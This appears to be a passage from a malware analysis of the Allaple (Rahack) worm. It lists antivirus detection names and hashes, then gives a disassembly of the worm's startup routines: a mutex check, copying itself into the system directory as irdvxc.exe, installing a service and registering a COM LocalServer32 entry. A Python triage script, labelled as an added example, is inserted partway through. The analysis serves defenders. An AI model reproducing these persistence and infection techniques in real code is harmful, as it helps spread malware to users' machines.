F-Prot 4.6.2.117 2010.09.21 W32/EmailWorm.AMV

F-Secure 9.0.15370.0 2010.09.22 Net-Worm:W32/Allaple.gen!B

Fortinet 4.1.143.0 2010.09.21 W32/Allaple.gen!tr

GData 21 2010.09.22 Win32.Worm.Allaple.Gen

Ikarus T3.1.1.88.0 2010.09.22 Net-Worm.Win32.Allaple.b

Jiangmin 13.0.900 2010.09.21 Worm/Allaple.Gen

K7AntiVirus 9.63.2572 2010.09.21 EmailWorm

Kaspersky 7.0.0.125 2010.09.22 Net-Worm.Win32.Allaple.d

McAfee 5.400.0.1158 2010.09.22 W32/RAHack

McAfee-GW-Edition 2010.1C 2010.09.22 W32/RAHack

Microsoft 1.6201 2010.09.22 Worm:Win32/Allaple.A

NOD32 5468 2010.09.21 Win32/Allaple

Norman 6.06.06 2010.09.21 Allaple.QJK

nProtect 2010-09-22.01 2010.09.22 –

Panda 10.0.2.7 2010.09.21 W32/Rahack.gen.worm

PCTools 7.0.3.5 2010.09.22 Malware.Rahack

Prevx 3.0 2010.09.22 High Risk Worm

Rising 22.66.00.07 2010.09.21 Worm.Win32.Allaple.a

Sophos 4.57.0 2010.09.22 W32/Allaple-F

Sunbelt 6909 2010.09.22 Net-Worm.Win32.Allaple.gen (v)

SUPERAntiSpyware 4.40.0.1006 2010.09.22 –

Symantec 20101.1.1.7 2010.09.22 W32.Rahack.H

TheHacker 6.7.0.0.027 2010.09.21 W32/RAHack.gen

TrendMicro 9.120.0.1004 2010.09.21 WORM_ALLAPLE.IK

TrendMicro-HouseCall 9.120.0.1004 2010.09.22 WORM_ALLAPLE.IK

VBA32 3.12.14.1 2010.09.21 OScope.Malware-Cryptor.Win32.Allaple

ViRobot 2010.8.31.4017 2010.09.22 Worm.Win32.Allaple.Gen

VirusBuster 12.65.18.3 2010.09.22 Worm.Akbot.Gen

Additional information

MD5 : 2e15ee1cb958b847a575ea793152ea1c

SHA1 : 680bfa7113afb57509e775d75b35442b53015806

SHA256: ea8edb2cd7c68b971d66ede25cac2346dc0f3713fa436b175de930a649cb341d

IV] The mal code main section:

00347A15 55 PUSH EBP

00347A16 8BEC MOV EBP,ESP

00347A18 83C4 F0 ADD ESP,-10

00347A1B 57 PUSH EDI

00347A1C 56 PUSH ESI

00347A1D 53 PUSH EBX

00347A1E E8 CD040000 CALL 00347EF0

00347A23 68 40BA3500 PUSH 35BA40

00347A28 68 79473500 PUSH 354779 ; ASCII “-embedding”

00347A2D E8 CE95FFFF CALL 00341000

00347A32 83F8 01 CMP EAX,1

00347A35 75 05 JNZ SHORT 00347A3C

00347A37 E8 F4010000 CALL 00347C30

00347A3C 68 0E453500 PUSH 35450E ; ASCII “jhdgcjhasgdc09890gjasgcjhg2763876uyg3fhg”

00347A41 6A 01 PUSH 1

00347A43 6A 00 PUSH 0

00347A45 E8 F2060000 CALL 0034813C ; JMP to kernel32.CreateMutexA

00347A4A A3 C4BB3500 MOV DWORD PTR DS:[35BBC4],EAX

00347A4F E8 48070000 CALL 0034819C ; JMP to ntdll.RtlGetLastWin32Error

00347A54 0BC0 OR EAX,EAX

00347A56 74 12 JE SHORT 00347A6A

00347A58 FF35 C4BB3500 PUSH DWORD PTR DS:[35BBC4]

00347A5E E8 BB060000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347A63 6A 00 PUSH 0

00347A65 E8 F0060000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347A6A 6A 0C PUSH 0C

00347A6C E8 45080000 CALL 003482B6 ; JMP to ole32.CoTaskMemAlloc

00347A71 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX

00347A74 8BF0 MOV ESI,EAX

00347A76 6A 00 PUSH 0

00347A78 6A 00 PUSH 0

00347A7A 6A 00 PUSH 0

00347A7C 6A 00 PUSH 0

00347A7E E8 A7060000 CALL 0034812A ; JMP to kernel32.CreateEventA

00347A83 8906 MOV DWORD PTR DS:[ESI],EAX

00347A85 BF 01000000 MOV EDI,1

00347A8A 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347A8D 50 PUSH EAX

00347A8E 6A 01 PUSH 1

00347A90 6A 00 PUSH 0

00347A92 68 A0303400 PUSH 3430A0

00347A97 6A 00 PUSH 0

00347A99 6A 00 PUSH 0

00347A9B E8 A8060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347AA0 8946 08 MOV DWORD PTR DS:[ESI+8],EAX

00347AA3 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347AA6 50 PUSH EAX

00347AA7 6A 01 PUSH 1

00347AA9 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347AAC 68 207B3400 PUSH 347B20

00347AB1 6A 00 PUSH 0

00347AB3 6A 00 PUSH 0

00347AB5 E8 8E060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347ABA 50 PUSH EAX

00347ABB E8 5E060000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347AC0 BF 04000000 MOV EDI,4

00347AC5 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]

00347AC8 50 PUSH EAX

00347AC9 57 PUSH EDI

00347ACA 6A 00 PUSH 0

00347ACC 68 50273400 PUSH 342750

00347AD1 6A 00 PUSH 0

00347AD3 6A 00 PUSH 0

00347AD5 E8 6E060000 CALL 00348148 ; JMP to kernel32.CreateThread

00347ADA 8946 04 MOV DWORD PTR DS:[ESI+4],EAX

00347ADD 6A FF PUSH -1

00347ADF FF35 DCBB3500 PUSH DWORD PTR DS:[35BBDC]

00347AE5 E8 6C070000 CALL 00348256 ; JMP to kernel32.WaitForSingleObject

00347AEA 833D C0BB3500 00 CMP DWORD PTR DS:[35BBC0],0

00347AF1 74 1C JE SHORT 00347B0F

00347AF3 6A 01 PUSH 1

00347AF5 6A 00 PUSH 0

00347AF7 E8 749AFFFF CALL 00341570

00347AFC 68 E8030000 PUSH 3E8

00347B01 E8 2C070000 CALL 00348232 ; JMP to kernel32.Sleep

00347B06 6A 04 PUSH 4

00347B08 6A 00 PUSH 0

00347B0A E8 619AFFFF CALL 00341570

00347B0F 6A 00 PUSH 0

00347B11 E8 44060000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347B16 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347B1D 8D49 00 LEA ECX,DWORD PTR DS:[ECX]

00347B20 55 PUSH EBP

00347B21 8BEC MOV EBP,ESP

00347B23 83C4 F0 ADD ESP,-10

00347B26 57 PUSH EDI

00347B27 56 PUSH ESI

00347B28 53 PUSH EBX

00347B29 68 C8000000 PUSH 0C8

00347B2E E8 FF060000 CALL 00348232 ; JMP to kernel32.Sleep

00347B33 C745 F0 01000000 MOV DWORD PTR SS:[EBP-10],1

00347B3A 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]

00347B3D FF36 PUSH DWORD PTR DS:[ESI]

00347B3F 8F45 FC POP DWORD PTR SS:[EBP-4]

00347B42 FF76 08 PUSH DWORD PTR DS:[ESI+8]

00347B45 8F45 F8 POP DWORD PTR SS:[EBP-8]

00347B48 FF76 04 PUSH DWORD PTR DS:[ESI+4]

00347B4B 8F45 F4 POP DWORD PTR SS:[EBP-C]

00347B4E FF75 08 PUSH DWORD PTR SS:[EBP+8]

00347B51 E8 66070000 CALL 003482BC ; JMP to ole32.CoTaskMemFree

00347B56 68 80EE3600 PUSH 36EE80

00347B5B FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347B5E E8 F3060000 CALL 00348256 ; JMP to kernel32.WaitForSingleObject

00347B63 837D F0 00 CMP DWORD PTR SS:[EBP-10],0

00347B67 75 19 JNZ SHORT 00347B82

00347B69 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347B6C E8 9D060000 CALL 0034820E ; JMP to kernel32.ResumeThread

00347B71 FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00347B74 E8 BF060000 CALL 00348238 ; JMP to kernel32.SuspendThread

00347B79 C745 F0 01000000 MOV DWORD PTR SS:[EBP-10],1

00347B80 EB 1D JMP SHORT 00347B9F

00347B82 837D F0 01 CMP DWORD PTR SS:[EBP-10],1

00347B86 75 17 JNZ SHORT 00347B9F

00347B88 FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00347B8B E8 7E060000 CALL 0034820E ; JMP to kernel32.ResumeThread

00347B90 FF75 F8 PUSH DWORD PTR SS:[EBP-8]

00347B93 E8 A0060000 CALL 00348238 ; JMP to kernel32.SuspendThread

00347B98 C745 F0 00000000 MOV DWORD PTR SS:[EBP-10],0

00347B9F ^EB B5 JMP SHORT 00347B56

00347BA1 5B POP EBX

00347BA2 5E POP ESI

00347BA3 5F POP EDI

00347BA4 C9 LEAVE

00347BA5 C2 0400 RETN 4

00347BA8 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347BAF 90 NOP

00347BB0 55 PUSH EBP

00347BB1 8BEC MOV EBP,ESP

00347BB3 57 PUSH EDI

00347BB4 56 PUSH ESI

00347BB5 53 PUSH EBX

00347BB6 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]

00347BB9 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]

00347BBC 893D 3EB73500 MOV DWORD PTR DS:[35B73E],EDI

00347BC2 83C5 04 ADD EBP,4

00347BC5 BB FFFFFFFF MOV EBX,-1

00347BCA 68 00040000 PUSH 400

00347BCF 57 PUSH EDI

00347BD0 E8 09060000 CALL 003481DE ; JMP to kernel32.IsBadReadPtr

00347BD5 0BC0 OR EAX,EAX

00347BD7 75 20 JNZ SHORT 00347BF9

00347BD9 66:813F 4D5A CMP WORD PTR DS:[EDI],5A4D

00347BDE 75 19 JNZ SHORT 00347BF9

00347BE0 037F 3C ADD EDI,DWORD PTR DS:[EDI+3C]

00347BE3 813F 50450000 CMP DWORD PTR DS:[EDI],4550

00347BE9 75 0E JNZ SHORT 00347BF9

00347BEB 0FB74F 16 MOVZX ECX,WORD PTR DS:[EDI+16]

00347BEF F7C1 00200000 TEST ECX,2000

00347BF5 74 02 JE SHORT 00347BF9

00347BF7 33DB XOR EBX,EBX

00347BF9 0BDB OR EBX,EBX

00347BFB 75 1D JNZ SHORT 00347C1A

00347BFD E8 1E9DFFFF CALL 00341920

00347C02 83FE 01 CMP ESI,1

00347C05 75 0C JNZ SHORT 00347C13

00347C07 B8 01000000 MOV EAX,1

00347C0C 5B POP EBX

00347C0D 5E POP ESI

00347C0E 5F POP EDI

00347C0F C9 LEAVE

00347C10 C2 0C00 RETN 0C

00347C13 5B POP EBX

00347C14 5E POP ESI

00347C15 5F POP EDI

00347C16 C9 LEAVE

00347C17 C2 0C00 RETN 0C

00347C1A 83ED 04 SUB EBP,4

00347C1D 5B POP EBX

00347C1E 5E POP ESI

00347C1F 5F POP EDI

00347C20 C9 LEAVE

00347C21 C2 0C00 RETN 0C

00347C24 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347C2B 05 00000000 ADD EAX,0

00347C30 55 PUSH EBP

00347C31 8BEC MOV EBP,ESP

00347C33 81C4 80FEFFFF ADD ESP,-180

00347C39 57 PUSH EDI

00347C3A 56 PUSH ESI

00347C3B 53 PUSH EBX

00347C3C 6A 00 PUSH 0

00347C3E E8 67060000 CALL 003482AA ; JMP to ole32.CoInitialize

00347C43 68 189E3500 PUSH 359E18

00347C48 E8 33590000 CALL 0034D580

00347C4D A3 08BB3500 MOV DWORD PTR DS:[35BB08],EAX

00347C52 68 0CBB3500 PUSH 35BB0C

00347C57 6A 01 PUSH 1

00347C59 6A 04 PUSH 4

00347C5B FF35 08BB3500 PUSH DWORD PTR DS:[35BB08]

00347C61 68 4AB73500 PUSH 35B74A

00347C66 E8 45060000 CALL 003482B0 ; JMP to ole32.CoRegisterClassObject

00347C6B 68 2C010000 PUSH 12C

00347C70 8D85 80FEFFFF LEA EAX,DWORD PTR SS:[EBP-180]

00347C76 50 PUSH EAX

00347C77 6A 00 PUSH 0

00347C79 E8 2A050000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347C7E 33C0 XOR EAX,EAX

00347C80 8D7D AC LEA EDI,DWORD PTR SS:[EBP-54]

00347C83 B9 44000000 MOV ECX,44

00347C88 F3:AA REP STOS BYTE PTR ES:[EDI]

00347C8A C745 AC 44000000 MOV DWORD PTR SS:[EBP-54],44

00347C91 33D2 XOR EDX,EDX

00347C93 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00347C96 50 PUSH EAX

00347C97 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]

00347C9A 50 PUSH EAX

00347C9B 52 PUSH EDX

00347C9C 52 PUSH EDX

00347C9D 52 PUSH EDX

00347C9E 52 PUSH EDX

00347C9F 52 PUSH EDX

00347CA0 52 PUSH EDX

00347CA1 8D85 80FEFFFF LEA EAX,DWORD PTR SS:[EBP-180]

00347CA7 50 PUSH EAX

00347CA8 52 PUSH EDX

00347CA9 E8 94040000 CALL 00348142 ; JMP to kernel32.CreateProcessA

00347CAE 6A 00 PUSH 0

00347CB0 E8 A5040000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347CB5 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347CBC 8D6424 00 LEA ESP,DWORD PTR SS:[ESP]

00347CC0 55 PUSH EBP

00347CC1 8BEC MOV EBP,ESP

00347CC3 81C4 70FEFFFF ADD ESP,-190

00347CC9 57 PUSH EDI

00347CCA 56 PUSH ESI

00347CCB 53 PUSH EBX

00347CCC 6A 00 PUSH 0

00347CCE 6A 64 PUSH 64

00347CD0 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347CD6 50 PUSH EAX

00347CD7 E8 F8060000 CALL 003483D4

00347CDC 6A 00 PUSH 0

00347CDE 68 2C010000 PUSH 12C

00347CE3 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347CE9 50 PUSH EAX

00347CEA E8 E5060000 CALL 003483D4

00347CEF 68 2C010000 PUSH 12C

00347CF4 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347CFA 50 PUSH EAX

00347CFB 6A 00 PUSH 0

00347CFD E8 A6040000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347D02 BA 64000000 MOV EDX,64

00347D07 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C]

00347D0D 8D05 4AB73500 LEA EAX,DWORD PTR DS:[35B74A]

00347D13 50 PUSH EAX

00347D14 E8 77120000 CALL 00348F90

00347D19 68 7AB73500 PUSH 35B77A ; ASCII "{3ED2D4F1-8C31-030B-F817-29B6C522E670}"

00347D1E 68 57453500 PUSH 354557 ; ASCII "{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}"

00347D23 68 4AB73500 PUSH 35B74A

00347D28 E8 B3A7FFFF CALL 003424E0

00347D2D 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347D33 50 PUSH EAX

00347D34 E8 C7A9FFFF CALL 00342700

00347D39 8D85 70FEFFFF LEA EAX,DWORD PTR SS:[EBP-190]

00347D3F 50 PUSH EAX

00347D40 68 37453500 PUSH 354537 ; ASCII "CLSID\%s"

00347D45 68 7AB73500 PUSH 35B77A ; ASCII "{3ED2D4F1-8C31-030B-F817-29B6C522E670}"

00347D4A 68 00000080 PUSH 80000000

00347D4F E8 1CA7FFFF CALL 00342470

00347D54 8D85 D4FEFFFF LEA EAX,DWORD PTR SS:[EBP-12C]

00347D5A 50 PUSH EAX

00347D5B 68 40453500 PUSH 354540 ; ASCII "CLSID\%s\LocalServer32"

00347D60 68 7AB73500 PUSH 35B77A ; ASCII "{3ED2D4F1-8C31-030B-F817-29B6C522E670}"

00347D65 68 00000080 PUSH 80000000

00347D6A E8 01A7FFFF CALL 00342470

00347D6F 5B POP EBX

00347D70 5E POP ESI

00347D71 5F POP EDI

00347D72 C9 LEAVE

00347D73 C3 RETN

00347D74 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347D7B 05 00000000 ADD EAX,0
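The routine that ends at 00347D73 is the COM registration step: it fetches the module path with GetModuleFileNameA, formats a GUID through the "{%08lX-%04X-...}" pattern into the "{3ED2D4F1-...}" string, and then the two calls to 00342470 receive 80000000 (HKEY_CLASSES_ROOT), that CLSID string, the "CLSID\%s" and "CLSID\%s\LocalServer32" key formats and a value buffer, the second one being the module path. For triage on a suspect host, the Python script below (an added example, not code from the page or from the worm) parses a .reg export of HKEY_CLASSES_ROOT\CLSID, collects every LocalServer32 target, and resolves the CLSIDs referenced by object tags in HTML files to the executable they would launch. The .reg text and the HTML pages are constructed samples; only the CLSID string and the irdvxc.exe name come from the listing, the paths, the placeholder default value and the second, benign CLSID are invented.

```python
import re

# Constructed sample .reg export (assumption: not taken from the page). Only the
# CLSID string and the irdvxc.exe name come from the listing; the paths, the
# placeholder default value and the benign second CLSID are invented.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{3ED2D4F1-8C31-030B-F817-29B6C522E670}]
@="placeholder"

[HKEY_CLASSES_ROOT\CLSID\{3ED2D4F1-8C31-030B-F817-29B6C522E670}\LocalServer32]
@="C:\\WINDOWS\\system32\\irdvxc.exe"

[HKEY_CLASSES_ROOT\CLSID\{00000000-1111-2222-3333-444444444444}\LocalServer32]
@="C:\\Program Files\\Example\\server.exe"
"""

# Constructed HTML files (assumption): one page carries an object tag prepended
# before its real content, the others do not reference the worm's CLSID.
SAMPLE_HTML = {
    "index.html": '<object classid="clsid:3ED2D4F1-8C31-030B-F817-29B6C522E670"></object>'
                  '<html><body>site</body></html>',
    "about.htm": '<html><body>clean page</body></html>',
    "app.html": '<object classid="clsid:{00000000-1111-2222-3333-444444444444}"></object>',
}

KEY_RE = re.compile(r"^\[HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]{36}\})\\LocalServer32\]$", re.I)
DEFAULT_RE = re.compile(r'^@="(.*)"$')
CLASSID_RE = re.compile(r'classid\s*=\s*["\']?\s*clsid:\{?([0-9A-F-]{36})\}?', re.I)


def parse_local_servers(reg_text):
    """Map each CLSID to the command stored in its LocalServer32 default value."""
    servers = {}
    current = None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            continue
        if line.startswith("["):           # any other key: stop collecting
            current = None
            continue
        v = DEFAULT_RE.match(line)
        if v and current:
            # .reg exports escape quotes and backslashes inside string values
            servers[current] = v.group(1).replace('\\"', '"').replace("\\\\", "\\")
    return servers


def find_classids(html):
    """Return the set of CLSIDs referenced by <object classid=...> tags, normalised to {GUID}."""
    return {"{" + g.upper() + "}" for g in CLASSID_RE.findall(html)}


def correlate(reg_text, html_files):
    """For every page, resolve each referenced CLSID to the executable registered
    for it; CLSIDs with no LocalServer32 entry are reported with None."""
    servers = parse_local_servers(reg_text)
    hits = []
    for name, html in sorted(html_files.items()):
        for clsid in sorted(find_classids(html)):
            hits.append((name, clsid, servers.get(clsid)))
    return hits


if __name__ == "__main__":
    for page, clsid, exe in correlate(SAMPLE_REG, SAMPLE_HTML):
        print(f"{page}: {clsid} -> {exe}")
```

The output is the list of (page, CLSID, executable) triples; a page whose object tag resolves to a bare executable in the system directory is the thing to look at next, and the same resolution can be run over a live registry with winreg instead of a .reg export.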

00347D80 55 PUSH EBP

00347D81 8BEC MOV EBP,ESP

00347D83 81C4 44FDFFFF ADD ESP,-2BC

00347D89 57 PUSH EDI

00347D8A 56 PUSH ESI

00347D8B 53 PUSH EBX

00347D8C 33DB XOR EBX,EBX

00347D8E 68 F4010000 PUSH 1F4

00347D93 E8 9A040000 CALL 00348232 ; JMP to kernel32.Sleep

00347D98 8D85 44FDFFFF LEA EAX,DWORD PTR SS:[EBP-2BC]

00347D9E 50 PUSH EAX

00347D9F 68 A4473500 PUSH 3547A4 ; ASCII "patch:"

00347DA4 E8 5792FFFF CALL 00341000

00347DA9 83F8 01 CMP EAX,1

00347DAC 75 0D JNZ SHORT 00347DBB

00347DAE 8D85 44FDFFFF LEA EAX,DWORD PTR SS:[EBP-2BC]

00347DB4 50 PUSH EAX

00347DB5 E8 94030000 CALL 0034814E ; JMP to kernel32.DeleteFileA

00347DBA 43 INC EBX

00347DBB 8BC3 MOV EAX,EBX

00347DBD 5B POP EBX

00347DBE 5E POP ESI

00347DBF 5F POP EDI

00347DC0 C9 LEAVE

00347DC1 C3 RETN

00347DC2 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347DC9 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347DD0 55 PUSH EBP

00347DD1 8BEC MOV EBP,ESP

00347DD3 83C4 FC ADD ESP,-4

00347DD6 6A 00 PUSH 0

00347DD8 68 80000000 PUSH 80

00347DDD 6A 03 PUSH 3

00347DDF 6A 00 PUSH 0

00347DE1 6A 01 PUSH 1

00347DE3 68 00000080 PUSH 80000000

00347DE8 FF75 08 PUSH DWORD PTR SS:[EBP+8]

00347DEB E8 40030000 CALL 00348130 ; JMP to kernel32.CreateFileA

00347DF0 8945 FC MOV DWORD PTR SS:[EBP-4],EAX

00347DF3 83F8 FF CMP EAX,-1

00347DF6 74 41 JE SHORT 00347E39

00347DF8 6A 00 PUSH 0

00347DFA FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347DFD E8 94030000 CALL 00348196 ; JMP to kernel32.GetFileSize

00347E02 8BD8 MOV EBX,EAX

00347E04 53 PUSH EBX

00347E05 E8 AC040000 CALL 003482B6 ; JMP to ole32.CoTaskMemAlloc

00347E0A 0BC0 OR EAX,EAX

00347E0C 74 2B JE SHORT 00347E39

00347E0E 8BF8 MOV EDI,EAX

00347E10 0BC0 OR EAX,EAX

00347E12 74 25 JE SHORT 00347E39

00347E14 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]

00347E17 8939 MOV DWORD PTR DS:[ECX],EDI

00347E19 6A 00 PUSH 0

00347E1B 54 PUSH ESP

00347E1C 53 PUSH EBX

00347E1D 57 PUSH EDI

00347E1E FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347E21 E8 E2030000 CALL 00348208 ; JMP to kernel32.ReadFile

00347E26 FF75 FC PUSH DWORD PTR SS:[EBP-4]

00347E29 E8 F0020000 CALL 0034811E ; JMP to kernel32.CloseHandle

00347E2E 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]

00347E31 8919 MOV DWORD PTR DS:[ECX],EBX

00347E33 33C0 XOR EAX,EAX

00347E35 C9 LEAVE

00347E36 C2 0C00 RETN 0C

00347E39 B8 FFFFFFFF MOV EAX,-1

00347E3E C9 LEAVE

00347E3F C2 0C00 RETN 0C

00347E42 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347E49 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347E50 57 PUSH EDI

00347E51 56 PUSH ESI

00347E52 53 PUSH EBX

00347E53 68 58020000 PUSH 258

00347E58 68 AAB03500 PUSH 35B0AA ; ASCII "C:\Documents and Settings\norman\Desktopafa3b27802d2ab6a751248dbe32cb62.exe"

00347E5D 6A 00 PUSH 0

00347E5F E8 44030000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347E64 C705 58BC3500 00>MOV DWORD PTR DS:[35BC58],0

00347E6E 68 484A3500 PUSH 354A48 ; ASCII "icmp.dll"

00347E73 E8 72030000 CALL 003481EA ; JMP to kernel32.LoadLibraryA

00347E78 8BF0 MOV ESI,EAX

00347E7A 0BF6 OR ESI,ESI

00347E7C 74 5A JE SHORT 00347ED8

00347E7E 68 514A3500 PUSH 354A51 ; ASCII "IcmpCreateFile"

00347E83 56 PUSH ESI

00347E84 E8 2B030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347E89 0BC0 OR EAX,EAX

00347E8B 74 4B JE SHORT 00347ED8

00347E8D A3 48BC3500 MOV DWORD PTR DS:[35BC48],EAX

00347E92 68 604A3500 PUSH 354A60 ; ASCII "IcmpSendEcho"

00347E97 56 PUSH ESI

00347E98 E8 17030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347E9D 0BC0 OR EAX,EAX

00347E9F 74 37 JE SHORT 00347ED8

00347EA1 A3 4CBC3500 MOV DWORD PTR DS:[35BC4C],EAX

00347EA6 68 6D4A3500 PUSH 354A6D ; ASCII "IcmpParseReplies"

00347EAB 56 PUSH ESI

00347EAC E8 03030000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347EB1 0BC0 OR EAX,EAX

00347EB3 74 23 JE SHORT 00347ED8

00347EB5 A3 50BC3500 MOV DWORD PTR DS:[35BC50],EAX

00347EBA 68 7E4A3500 PUSH 354A7E ; ASCII "IcmpCloseHandle"

00347EBF 56 PUSH ESI

00347EC0 E8 EF020000 CALL 003481B4 ; JMP to kernel32.GetProcAddress

00347EC5 0BC0 OR EAX,EAX

00347EC7 74 0F JE SHORT 00347ED8

00347EC9 A3 54BC3500 MOV DWORD PTR DS:[35BC54],EAX

00347ECE C705 58BC3500 01>MOV DWORD PTR DS:[35BC58],1

00347ED8 68 36AE3500 PUSH 35AE36

00347EDD E8 EA020000 CALL 003481CC ; JMP to kernel32.InitializeCriticalSection

00347EE2 68 1EAE3500 PUSH 35AE1E

00347EE7 E8 E0020000 CALL 003481CC ; JMP to kernel32.InitializeCriticalSection

00347EEC 5B POP EBX

00347EED 5E POP ESI

00347EEE 5F POP EDI

00347EEF C3 RETN

00347EF0 55 PUSH EBP

00347EF1 8BEC MOV EBP,ESP

00347EF3 81C4 5CF9FFFF ADD ESP,-6A4

00347EF9 57 PUSH EDI

00347EFA 56 PUSH ESI

00347EFB 53 PUSH EBX

00347EFC 68 2C010000 PUSH 12C

00347F01 8D85 7CFCFFFF LEA EAX,DWORD PTR SS:[EBP-384]

00347F07 50 PUSH EAX

00347F08 6A 00 PUSH 0

00347F0A E8 99020000 CALL 003481A8 ; JMP to kernel32.GetModuleFileNameA

00347F0F 8D95 7CFCFFFF LEA EDX,DWORD PTR SS:[EBP-384]

00347F15 48 DEC EAX

00347F16 807C10 FC 5C CMP BYTE PTR DS:[EAX+EDX-4],5C

00347F1B 0F85 BB000000 JNZ 00347FDC

00347F21 68 58020000 PUSH 258

00347F26 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F2C 50 PUSH EAX

00347F2D E8 88020000 CALL 003481BA ; JMP to kernel32.GetSystemDirectoryA

00347F32 8D95 A8FDFFFF LEA EDX,DWORD PTR SS:[EBP-258]

00347F38 807C10 FF 5C CMP BYTE PTR DS:[EAX+EDX-1],5C

00347F3D 74 06 JE SHORT 00347F45

00347F3F 66:C70410 5C00 MOV WORD PTR DS:[EAX+EDX],5C

00347F45 68 02453500 PUSH 354502 ; ASCII "irdvxc.exe "

00347F4A 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F50 50 PUSH EAX

00347F51 E8 12030000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347F56 6A 00 PUSH 0

00347F58 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F5E 50 PUSH EAX

00347F5F 8D85 7CFCFFFF LEA EAX,DWORD PTR SS:[EBP-384]

00347F65 50 PUSH EAX

00347F66 E8 B9010000 CALL 00348124 ; JMP to kernel32.CopyFileA

00347F6B 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F71 50 PUSH EAX

00347F72 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347F78 50 PUSH EAX

00347F79 E8 FC020000 CALL 0034827A ; JMP to kernel32.lstrcpyA

00347F7E 8D85 A8FDFFFF LEA EAX,DWORD PTR SS:[EBP-258]

00347F84 50 PUSH EAX

00347F85 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347F8B 50 PUSH EAX

00347F8C E8 E9020000 CALL 0034827A ; JMP to kernel32.lstrcpyA

00347F91 68 14473500 PUSH 354714 ; ASCII "/installservice"

00347F96 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347F9C 50 PUSH EAX

00347F9D E8 C6020000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347FA2 68 0D473500 PUSH 35470D ; ASCII "/start"

00347FA7 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347FAD 50 PUSH EAX

00347FAE E8 B5020000 CALL 00348268 ; JMP to kernel32.lstrcatA

00347FB3 8D85 ECFAFFFF LEA EAX,DWORD PTR SS:[EBP-514]

00347FB9 50 PUSH EAX

00347FBA E8 31000000 CALL 00347FF0

00347FBF 68 D0070000 PUSH 7D0

00347FC4 E8 69020000 CALL 00348232 ; JMP to kernel32.Sleep

00347FC9 8D85 5CF9FFFF LEA EAX,DWORD PTR SS:[EBP-6A4]

00347FCF 50 PUSH EAX

00347FD0 E8 1B000000 CALL 00347FF0

00347FD5 6A 00 PUSH 0

00347FD7 E8 7E010000 CALL 0034815A ; JMP to kernel32.ExitProcess

00347FDC 5B POP EBX

00347FDD 5E POP ESI

00347FDE 5F POP EDI

00347FDF C9 LEAVE

00347FE0 C3 RETN

00347FE1 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347FE8 8DA424 00000000 LEA ESP,DWORD PTR SS:[ESP]

00347FEF 90 NOP

00347FF0 55 PUSH EBP

00347FF1 8BEC MOV EBP,ESP

00347FF3 83C4 AC ADD ESP,-54

00347FF6 57 PUSH EDI

00347FF7 56 PUSH ESI

00347FF8 53 PUSH EBX

00347FF9 33C0 XOR EAX,EAX

00347FFB 8D7D AC LEA EDI,DWORD PTR SS:[EBP-54]

00347FFE B9 44000000 MOV ECX,44

00348003 F3:AA REP STOS BYTE PTR ES:[EDI]

